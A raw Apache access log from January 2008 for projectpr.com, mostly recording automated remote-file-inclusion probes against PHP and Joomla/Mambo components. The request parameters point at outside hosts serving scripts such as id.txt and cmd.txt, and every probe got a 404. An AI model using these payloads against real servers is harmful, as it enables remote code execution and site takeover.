81.215.230.140 - - [11/Jan/2008:18:04:42 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:04:42 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:04:43 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:04:50 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:04:51 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:04:51 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:05:24 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:05:24 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:05:25 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:06:14 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:06:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:06:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:06:23 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:06:23 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:06:24 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:06:30 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:06:31 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:06:31 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:07:17 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
80.93.56.74 - - [11/Jan/2008:18:10:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.803" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:12:43 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:12:43 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:12:43 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:12:51 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:18:13:17 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:18:13:17 -0800] "GET /logs/access_%3Cwbr%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:13:51 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:13:51 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:13:52 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:18:14:08 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:16 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:17 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:14:17 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.65" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:18 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:19 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:20 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:20 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:14:42 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:15:03 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:15:03 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.19.123 - - [11/Jan/2008:18:15:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.30.226.137 - - [11/Jan/2008:18:15:54 -0800] "GET /logs/access.log HTTP/1.0" 200 58156 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:18:18:08 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.93.56.74 - - [11/Jan/2008:18:18:54 -0800] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.93.56.74 - - [11/Jan/2008:18:18:55 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.93.56.74 - - [11/Jan/2008:18:19:17 -0800] "GET /logs/access_070712.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 312 "-" "libwww-perl/5.803" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:20:14 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:20:14 -0800] "GET /logs//include.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:20:21 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:18:22:52 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 328 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:18:22:52 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:25:25 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:25:26 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:26:12 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.174.96.70 - - [11/Jan/2008:18:26:23 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:28:48 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:28:48 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:28:48 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:54 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:55 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:55 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:56 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:57 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:57 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:28:59 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:28:59 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:29:00 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:29:00 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:29:00 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:29:00 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:29:05 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:29:06 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.215.230.140 - - [11/Jan/2008:18:29:08 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:31:48 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:31:48 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:31:48 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.113.148.15 - - [11/Jan/2008:18:32:34 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:35:02 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:35:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:35:03 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:18:35:21 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:36:51 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.808" "www.projectpr.com"
71.236.230.52 - - [11/Jan/2008:18:38:36 -0800] "GET /logs/access_070812.log/administrator/components/com_forum/admin.forum.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
71.236.230.52 - - [11/Jan/2008:18:38:47 -0800] "GET /administrator/components/com_forum/admin.forum.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805" "www.projectpr.com"
71.236.230.52 - - [11/Jan/2008:18:38:51 -0800] "GET /logs/administrator/components/com_forum/admin.forum.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:42:48 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:42:49 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:18:42:49 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:18:42:54 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
202.57.162.49 - - [11/Jan/2008:18:48:06 -0800] "GET /logs//SQuery/lib/gore.php?libpath=http://www.apnic.net/index.html? HTTP/1.0" 404 255 "-" "Mozilla/5.0" "www.projectpr.com"
202.57.162.49 - - [11/Jan/2008:18:48:08 -0800] "GET //SQuery/lib/gore.php?libpath=http://www.apnic.net/index.html? HTTP/1.0" 404 250 "-" "Mozilla/5.0" "www.projectpr.com"
193.69.41.130 - - [11/Jan/2008:18:49:47 -0800] "GET /newspublish/include.php?path[docroot]=http://tiagow.us/echo.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:18:52:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
82.160.16.3 - - [11/Jan/2008:18:54:04 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
82.160.16.3 - - [11/Jan/2008:18:54:05 -0800] "GET /newspublish/include.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:18:55:20 -0800] "GET /logs/access_070912.log//login.php?dir=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:18:55:20 -0800] "GET //login.php?dir=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:18:55:21 -0800] "GET /logs//login.php?dir=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
193.69.41.130 - - [11/Jan/2008:18:55:49 -0800] "GET /!scanhttp://tiagow.us/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:18:57:06 -0800] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:18:57:06 -0800] "GET /newspublish/include.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:18:57:06 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:19:04:07 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 337 "-" "libwww-perl/5.803" "www.projectpr.com"
205.178.184.155 - - [11/Jan/2008:19:04:38 -0800] "GET / HTTP/1.1" 200 9521 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "projectpr.com"
71.236.230.52 - - [11/Jan/2008:19:05:28 -0800] "GET /logs/access.log/administrator/components/com_forum/admin.forum.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:19:07:29 -0800] "GET /logs/access_071012.log/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:19:07:30 -0800] "GET /!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:19:07:30 -0800] "GET /logs/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:19:08:45 -0800] "GET /logs/access_070912.log/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.208.99.103 - - [11/Jan/2008:19:09:15 -0800] "GET /logs/access_070912.log/newspublish/include.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:04 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:05 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:11 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:30 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:36 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:15:37 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:16:57 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:19:17:11 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.29.90 - - [11/Jan/2008:19:36:59 -0800] "GET /logs/access_070712.log/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
